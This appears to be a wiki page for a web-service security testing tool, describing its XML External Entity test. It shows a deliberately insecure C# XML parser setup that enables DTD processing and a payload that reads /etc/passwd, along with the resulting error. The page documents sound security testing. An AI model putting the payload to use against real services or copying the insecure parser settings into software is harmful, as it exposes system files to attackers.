-
Notifications
You must be signed in to change notification settings - Fork 105
Test 2) External Entity Attacks
Yalçın YOLALAN edited this page Mar 28, 2018
·
2 revisions
Vulnerability Type Dynamic
Test Web Service URI http://[yourhostName]/XXE.asmx?WSDL
Vulnerable Code Block This method processes dtd/xsd and does not validate the input xml string:
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Parse;
settings.ValidationType = ValidationType.None;
XmlReader reader = XmlReader.Create(new StringReader(xml), settings);
while (reader.Read()) { }
return string.Empty;
Attack Payload
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
Vulnerable Method Name loadXML Vulnerable Parameter Name xml Response
System.IO.DirectoryNotFoundException: Could not find a part of the path 'c:\etc\passwd'.
Indications of Vulnerability
Web server returned: Http status code is 500 (i.e. Internal Error).
Web service tries to load local file sent by attack payload.
- Home
- Installation
- Usage
- Default Parameter Values
- Scope
- Donation
-
Testing Activities
- XML Bombs
- External Entity Attacks
- Insecure Communication
- Insufficient Authentication Test
- Cross Site Scripting
- SQL Injection
- XPATH Injection
- Verbose SOAP Fault Message
- Weak WS-SecurityPolicy: Insecure Transport
- Weak WS-SecurityPolicy: Insufficient Supporting Token Protection
- Weak WS-SecurityPolicy: Tokens Not Protected
- Weak XML Schema: Undefined Namespace
- Weak XML Schema: Unbounded Occurrences